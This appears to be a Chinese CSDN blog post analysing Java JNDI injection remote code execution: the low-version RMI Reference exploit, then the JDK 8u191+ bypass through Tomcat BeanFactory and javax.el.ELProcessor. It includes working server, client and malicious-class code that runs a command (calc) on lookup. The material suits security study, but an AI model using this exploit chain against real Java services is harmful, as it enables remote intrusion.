[Java安全]JDK8u191之后的JNDI注入绕过(javax.el.ELProcessor依赖)

本文详细介绍了JNDI注入的利用流程,从低版本的漏洞利用到JDK 8u191之后的限制及其绕过方法。通过分析JNDI注入的生命周期,展示了如何在高版本JDK中通过特定配置和技巧重新触发远程代码执行。涉及到的关键技术包括RMI、LDAP、ReferenceWrapper和ObjectFactory。
摘要由CSDN通过智能技术生成

环境

我们知道在JDK 6u211、7u201、8u191、11.0.1之后,增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给禁了
切换到8u191之后就好了,我这里随便选择了8u201
在这里插入图片描述

Maven依赖

<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-catalina</artifactId>
    <version>8.5.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.el/com.springsource.org.apache.el -->
<dependency>
    <groupId>org.apache.el</groupId>
    <artifactId>com.springsource.org.apache.el</artifactId>
    <version>7.0.26</version>
</dependency>

利用分析

要知道高版本我认为还是需要先了解低版本的利用链

低版本流程分析

在桌面启一个web服务,因为我桌面有恶意类
在这里插入图片描述
启动server端

String uri = "http://127.0.0.1:8080/";
System.out.println("[*]classFactoryLocation: " + uri);
Registry registry = LocateRegistry.createRegistry(1099);
Reference refObj = new Reference("abcdefg", "TouchFile", uri);
ReferenceWrapper refObjWrapper = new ReferenceWrapper(refObj);
System.out.println("[*]Binding 'demo' to 'rmi://127.0.0.1:1099/YYDS'");
registry.bind("YYDS", refObjWrapper);

运行client

String uri = "rmi://127.0.0.1:1099/YYDS";
Context ctx = new InitialContext();
ctx.lookup(uri);

恶意类

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"calc"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

debug看一下首先从RMI注册表中lookup查询到服务端中目标类的Reference后返回一个ReferenceWrapper_Stub类实例,该类实例就是客户端的存根、用于实现和服务端进行交互,最后调用decodeObject()函数来解析
调用getObjectInstance
在这里插入图片描述
继续跟进getObjectFactoryFromReference,从Reference中获取ObjectFactory
在这里插入图片描述
调用loadClass()函数来远程加载恶意类
在这里插入图片描述

成功弹出计算器
在这里插入图片描述

JDK8u191之后的JNDI注入绕过

切换版本后如果还是原来的代码
在这里插入图片描述
也可以看到在使用URLClassLoader加载器加载远程类之前加了个if语句检测com.sun.jndi.ldap.object.trustURLCodebase的值是否为true,而该设置项的值默认为false在这里插入图片描述
所以大师父们解决的思路是classFactoryLocation设置为null

在这里插入图片描述
所以我们继续,发现NamingManager类的getObjectInstance()函数,其中调用了getObjectFactoryFromReference()函数来从Reference中获取ObjectFactory类实例
通过loadClass()函数来加载我们传入的org.apache.naming.factory.BeanFactory
在这里插入图片描述
再往下调用ObjectFactory接口实现类实例的getObjectInstance()函数
在这里插入图片描述
判断obj参数是否是ResourceRef类实例
在这里插入图片描述
现在我们来看看对于表达式解析的过程
首先这里获取了我们最初设置的x=eval
在这里插入图片描述
=分隔

在这里插入图片描述
这里是将xjavax.el.ELProcessor类的eval()方法绑定并存入hashmap

在这里插入图片描述
接着是多个do while语句来遍历获取ResourceRef类实例addr属性的元素,当获取到addrType为x的元素时退出当前所有循环
在这里插入图片描述
将刚才存入map的方法取出,并调用
在这里插入图片描述

细节就不扣了
在这里插入图片描述
弹出计算器
在这里插入图片描述

参考文章

https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html
https://www.cnblogs.com/zpchcbd/p/14941783.html
https://blog.csdn.net/caiqiiqi/article/details/105976072

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值